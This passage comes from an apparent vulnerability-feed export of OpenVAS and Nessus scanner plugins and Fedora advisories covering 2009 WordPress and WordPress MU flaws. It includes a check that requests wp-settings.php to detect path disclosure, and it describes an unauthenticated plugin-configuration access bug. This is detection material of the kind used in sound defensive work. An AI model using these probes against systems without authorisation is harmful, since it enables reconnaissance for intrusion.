http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-05-12T17:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2432", "CVE-2009-2335", "CVE-2009-2336"], "description": "The host is running WordPress / WordPress MU and is prone to multiple\n vulnerabilities", "modified": "2020-05-08T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800662", "type": "openvas", "title": "WordPress / WordPress MU Multiple Vulnerabilities - July09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress / WordPress MU Multiple Vulnerabilities - July09\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800662\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-2432\", \"CVE-2009-2336\", \"CVE-2009-2335\", \"CVE-2009-2334\");\n script_bugtraq_id(35581, 35584);\n script_name(\"WordPress / WordPress MU Multiple Vulnerabilities - July09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"wordpress/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1833\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Jul/1022528.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/504795/100/0/threaded\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to view the content of 
plugins\n configuration pages, inject malicious scripting code, or gain knowledge of sensitive username information.\");\n\n script_tag(name:\"affected\", value:\"WordPress / WordPress MU version prior to 2.8.1.\");\n\n script_tag(name:\"insight\", value:\"- Error in 'wp-settings.php' which may disclose sensitive information via\n a direct request.\n\n - Error occur when user attempt for failed login or password request depending\n on whether the user account exists, and it can be exploited by enumerate valid usernames.\n\n - Error in wp-admin/admin.php is does not require administrative authentication\n to access the configuration of a plugin, which allows attackers to specify a\n configuration file in the page parameter via collapsing-archives/options.txt,\n related-ways-to-take-action/options.php, wp-security-scan/securityscan.php,\n akismet/readme.txt and wp-ids/ids-admin.php.\");\n\n script_tag(name:\"solution\", value:\"Update to Version 2.8.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running WordPress / WordPress MU and is prone to multiple\n vulnerabilities\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:wordpress:wordpress_mu\", \"cpe:/a:wordpress:wordpress\" );\n\nif( ! infos = get_app_port_from_list( cpe_list:cpe_list ) )\n exit( 0 );\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif( ! 
dir = get_app_location( cpe:cpe, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nurl = dir + \"/wp-settings.php\";\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\nif( \"ABSPATHwp-include\" >< res && \"include_path\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:33:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2432", "CVE-2009-2335", "CVE-2009-2336", "CVE-2009-2431"], "description": "The host is running WordPress and is prone to Multiple Vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800657", "type": "openvas", "title": "WordPress Multiple Vulnerabilities - July09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Multiple Vulnerabilities - July09\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800657\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-2432\", \"CVE-2009-2431\", \"CVE-2009-2336\", \"CVE-2009-2335\", \"CVE-2009-2334\");\n script_bugtraq_id(35581, 35584);\n script_name(\"WordPress Multiple Vulnerabilities - July09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"wordpress/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1833\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Jul/1022528.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/504795/100/0/threaded\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to view the content of plugins\n configuration pages, inject malicious scripting code, or gain knowledge of sensitive username information.\");\n\n script_tag(name:\"affected\", value:\"WordPress version prior to 2.8.1 on all running platform.\");\n\n 
script_tag(name:\"insight\", value:\"- Error in 'wp-settings.php' which may disclose the sensitive information via\n a direct request.\n\n - username of a post's author is placed in an HTML comment, which allows\n remote attackers to obtain sensitive information by reading the HTML source.\n\n - Error occur when user attempt for failed login or password request depending\n on whether the user account exists, and it can be exploited by enumerate valid usernames.\n\n - wp-admin/admin.php does not require administrative authentication\n to access the configuration of a plugin, which allows attackers to specify a\n configuration file in the page parameter via collapsing-archives/options.txt,\n related-ways-to-take-action/options.php, wp-security-scan/securityscan.php,\n akismet/readme.txt and wp-ids/ids-admin.php.\");\n\n script_tag(name:\"solution\", value:\"Update to Version 2.8.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running WordPress and is prone to Multiple Vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! 
dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nurl = dir + \"/wp-settings.php\";\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"ABSPATHwp-include\" >< res && \"include_path\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "Wordpress is an online publishing / weblog package that makes it very easy, almost trivial, to get information out to people on the web. ", "modified": "2009-07-19T10:07:19", "published": "2009-07-19T10:07:19", "id": "FEDORA:6DE2A10F891", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: wordpress-2.8.1-1.fc11", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "Wordpress is an online publishing / weblog package that makes it very easy, almost trivial, to get information out to people on the web. ", "modified": "2009-07-19T10:17:03", "published": "2009-07-19T10:17:03", "id": "FEDORA:409AD10F89B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: wordpress-2.8.1-1.fc10", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "WordPress-MU is a derivative of the WordPress blogging codebase, to allow one instance to serve multiple users. 
", "modified": "2009-08-15T08:09:49", "published": "2009-08-15T08:09:49", "id": "FEDORA:2260910F855", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: wordpress-mu-2.8.4a-1.fc11", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1030", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "WordPress-MU is a derivative of the WordPress blogging codebase, to allow one instance to serve multiple users. ", "modified": "2009-08-15T08:11:21", "published": "2009-08-15T08:11:21", "id": "FEDORA:9869510F855", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: wordpress-mu-2.8.4a-1.fc10", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:07:36", "description": "Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-08-18T00:00:00", "title": "Fedora 10 : wordpress-mu-2.8.4a-1.fc10 (2009-8538)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-08-18T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:wordpress-mu"], "id": "FEDORA_2009-8538.NASL", "href": "https://www.tenable.com/plugins/nessus/40601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8538.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40601);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(34075, 35581, 35584);\n script_xref(name:\"FEDORA\", value:\"2009-8538\");\n\n script_name(english:\"Fedora 10 : wordpress-mu-2.8.4a-1.fc10 (2009-8538)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update spans MU-versions for the following security releases from\nupstream:\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-rele\nase/\n\n - Backport of XSS fixes from WordPress 2.8.2 * Backport of\n security fixes for admin.php?page= bugs (CVE-2009-2334)\n Backport of security fixes for admin.php?page= bugs\n (CVE-2009-2334) Backport of security fixes for\n admin.php?page= bugs (CVE-2009-2334)\n\nNote that 
Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://wordpress.org/development/2009/08/2-8-4-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wordpress.org/news/2009/08/2-8-4-security-release/\"\n );\n # http://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ab4dc04\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027878.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?22ed89ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress-mu package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress-mu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"wordpress-mu-2.8.4a-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress-mu\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:30", "description": " - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 11 : wordpress-2.8.1-1.fc11 (2009-7701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wordpress", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-7701.NASL", "href": "https://www.tenable.com/plugins/nessus/39856", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7701.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39856);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35584);\n script_xref(name:\"FEDORA\", value:\"2009-7701\");\n\n script_name(english:\"Fedora 11 : wordpress-2.8.1-1.fc11 (2009-7701)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026561.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ce20061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"wordpress-2.8.1-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:07:31", "description": " - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 2.7.1-2\n\n - Rebuilt for\n 
https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Wed Feb 11 2009 Adrian Reber <adrian at lisas.de> -\n 2.7.1-1\n\n - updated to 2.7.1\n\n - Wed Nov 26 2008 Adrian Reber <adrian at lisas.de> -\n 2.6.5-2\n\n - updated to 2.6.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-07-20T00:00:00", "title": "Fedora 10 : wordpress-2.8.1-1.fc10 (2009-7729)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:wordpress"], "id": "FEDORA_2009-7729.NASL", "href": "https://www.tenable.com/plugins/nessus/39859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7729.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39859);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_bugtraq_id(35584);\n script_xref(name:\"FEDORA\", value:\"2009-7729\");\n\n script_name(english:\"Fedora 10 : wordpress-2.8.1-1.fc10 (2009-7729)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fri Jul 10 2009 Adrian Reber <adrian at lisas.de> -\n 2.8.1-1\n\n - updated to 2.8.1 for security fixes - BZ 510745\n\n - Mon Jun 22 2009 Adrian Reber <adrian 
at lisas.de> -\n 2.8-1\n\n - updated to 2.8\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 2.7.1-2\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Wed Feb 11 2009 Adrian Reber <adrian at lisas.de> -\n 2.7.1-1\n\n - updated to 2.7.1\n\n - Wed Nov 26 2008 Adrian Reber <adrian at lisas.de> -\n 2.6.5-2\n\n - updated to 2.6.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=510745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026605.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8bdf78e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wordpress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(16, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 